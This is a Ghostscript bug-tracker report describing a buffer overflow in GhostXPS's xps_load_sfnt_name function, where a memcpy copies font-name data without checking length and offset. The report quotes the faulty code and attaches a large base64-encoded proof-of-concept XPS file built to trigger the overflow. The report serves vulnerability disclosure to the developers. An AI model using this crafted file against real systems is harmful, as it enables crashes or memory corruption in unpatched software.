b***@artifex.com
2017-03-01 22:16:18 UTC
http://bugs.ghostscript.com/show_bug.cgi?id=697629
Bug ID: 697629
Summary: BO in xps_load_sfnt_name function
Product: GhostXPS
Version: master
Hardware: PC
OS: Windows NT
Status: UNCONFIRMED
Severity: normal
Priority: P4
Component: General
Assignee: ***@artifex.com
Reporter: ***@gmail.com
QA Contact: gs-***@ghostscript.com
Word Size: ---
Created attachment 13441
--> http://bugs.ghostscript.com/attachment.cgi?id=13441&action=edit
bug report
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 && make debug
Machine Type: x86_64-unknown-linux-gnu
ghostpdl Version: Version: 9.21 Build date: Thu Feb 23 19:15:08 2017
Release Status: release
Source: git://git.ghostscript.com/ghostpdl.git)
Description:
A buffer overflow was detect in xps_load_sfnt_name function xps/xpsfont.c in
source file. The vulerability exists because memcpy operation does not verify
the lenght and offset parameters.
Affected code:
207 /* Full font name or postscript name */
208 if (nameid == 4 || nameid == 6)
209 {
210 if (pid == 1 && eid == 0 && langid == 0) /* mac roman, english
*/
211 {
212 if (found < 3)
213 {
214 memcpy(namep, namedata + stringoffset + offset,
length);
215 namep[length] = 0;
216 found = 3;
217 }
218 }
PoC.xps base64 encoded:
UEsDBAoAAAAAAGd3MzUAAAAAAAAAAAAAAAAKAAAARG9jdW1lbnRzL1BLAwQKAAAAAABndzM1AAAA
AAAAAAAAAAAADAAAAERvY3VtZW50cy8xL1BLAwQUAAAACAC8Pu00IumAmmsAAAB5AAAAHgAAAERv
Y3VtZW50cy8xL0ZpeGVkRG9jdW1lbnQuZmRvY3u/e7+NW2ZFaopLfnJpbmpeiUJFbk5esa1SRklJ
gZW+fnFyRmpuYrFebmZyUX5xflqJXnJ+rn5FQbG+kYGBqb6BmZKdTUBieqpzfl4JSHdwfmlRcqqt
EkisWN9QL60AyFBS0Lez0Uexxg4AUEsDBAoAAAAAAG93MzUAAAAAAAAAAAAAAAASAAAARG9jdW1l
bnRzLzEvUGFnZXMvUEsDBBQAAAAIAG93MzVKqWVPLgIAAKQFAAAZAAAARG9jdW1lbnRzLzEvUGFn
ZXMvMS5mcGFnZcVUzW7bMAy+D9g7ENo1tmXHTraiLjAsy7rD0KJN93NUbDkSakuZpKRJXm2HPdJe
YbQcJzm06C5DLVgSKYr6+InUn1+/z6dyw8trtuCwaWplcyKcW55FkS0Eb5gNG1kYbXXlwkI30WZp
o4TSLKIj0m042/z7lshwq1em4KUsnNSKmW1wz7fe01nN1CInXAUrS+CbLJ3IyYhSApdcLoTLSYrC
xetXAEfM4c3eofULuNQrJocTLs6jR5TeT/S4I7/2gak1s3DDVcnNzDBlK22anMQDiq3t4x4PWl8z
J2DCHMvJl3E2GGcizeoaLUSAkx2BqazrnLwpaNsI3Dqj7zkqqP9I1Dv6VG+XwsKdkoUuOZrJlpWZ
4LBcmaW2HHQFTkgLlaw54Og0rLmR1RbVzGHHodDKrhpuoGAKBFMlWu443glI5Q0mzIoDpj0EmGrl
7ozMyYEvG70d0zJJUhaM0mESpHRUBe/m83lQVFmaJbRg8TAJryaz2bTb39GFmD82t3KHAcYxgSsj
F1J9R6E9ppN+7KVnAmfGsG0InysP2/5cMeODVtqB9RyW8CCR+xIj4nYAy5ozJMmTw2C+WgBbMKms
86S9fMzJ8zH3txe+PNp0j7arlq4kevE05SFuywEucaTw1fftHHZ9ps+ELO4Vt/i+DEN0+mRZeUcn
9TGd9sF3qjZz37dJgVsgBop/AknP6ZPlgylzTJ5HEif8X+Rmp+QOsxNyx/Rwv8cgO7JPHqaLv1BL
AwQKAAAAAABndzM1AAAAAAAAAAAAAAAAGAAAAERvY3VtZW50cy8xL1BhZ2VzL19yZWxzL1BLAwQU
AAAACAANWiw1Z2Sn2OUAAAA9AQAAJAAAAERvY3VtZW50cy8xL1BhZ2VzL19yZWxzLzEuZnBhZ2Uu
cmVsc2XQO26EMBAG4KtY7u0xxhA2ArZZRUoVCXEBY4aHsmCvbaLN2VLkSLlCyKPIKtI0o/+fr5iP
t/fyeF3O5AV9mO1a0YQLSnA1tp/XsaJbHFhBj3XZ4FnHvRGm2QWyn6yholOM7h4gmAkXHbh1uO7J
YP2i4776EZw2z3pEkELk4P8a9NYk7avDf+IyG2+DHSI3doGrC19QBt/WZZs99sxjsJs3SEmr/Yix
opzDzzS/UYDiTvRSKs1ylUqmRD6wQ9d1zAyZyqQwOkklfzq17QMlj31FG1SpzrAvlFIHlXUJJVCX
cPOE+hNQSwMEFAAAAAgAvD7tNBCavRV2AAAAoAAAABsAAABGaXhlZERvY3VtZW50U2VxdWVuY2Uu
ZmRzZXF7v3u/jVtmRWqKS35yaW5qXklwamFpal5yqkJFbk5esa1SRklJgZW+fnFyRmpuYrFebmZy
UX5xflqJXnJ+rn5FQbG+kYGBqb6BmZKdDcyIoNS01CKwGcH5pUXJqbZKMJlifUN9FNv00lLyk5UU
9O1s9LG6wg4AUEsDBAoAAAAAAGd3MzUAAAAAAAAAAAAAAAAKAAAAUmVzb3VyY2VzL1BLAwQUAAAA
CAANWiw1GacENsJjAACkaAEANAAAAFJlc291cmNlcy84NzBkMjI0YS02NDMyLTQwNmYtOWJiYi1j
ZjU0NTIwY2ExMzIuT0RUVEbsnQl8E2Xex38zSXMfk7Rp2qTHhNAC6QUtRykIoRdHQYEWbFnQlrZQ
kKMqi6Luyq6rsIH1Wpd1vWBd11fZw7TobuHdXVjXW8T7QpHLWxF1F1ddZd7/TEpItDXJqh/qm+cb
nu88z/P/JzNJJ8+TYyaUbjHNbnhhx40rq0vTLOdW70q/6dg9DXuObVvpH5phXjTl72d5F5wHrupu
ALdPrp9T+ez7+3aDq54P6LdOq2+oXe5bogF3uo7iOdMb6qdcaehOAzLGA5orz6gvKTXtd90JcB9T
fO7MqukNn188oYpu7xJqj55bPaNx5rVLj9FVdwO261qXt3R+mvPZIeCx9QBvb129Stzke2o1cNBE
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
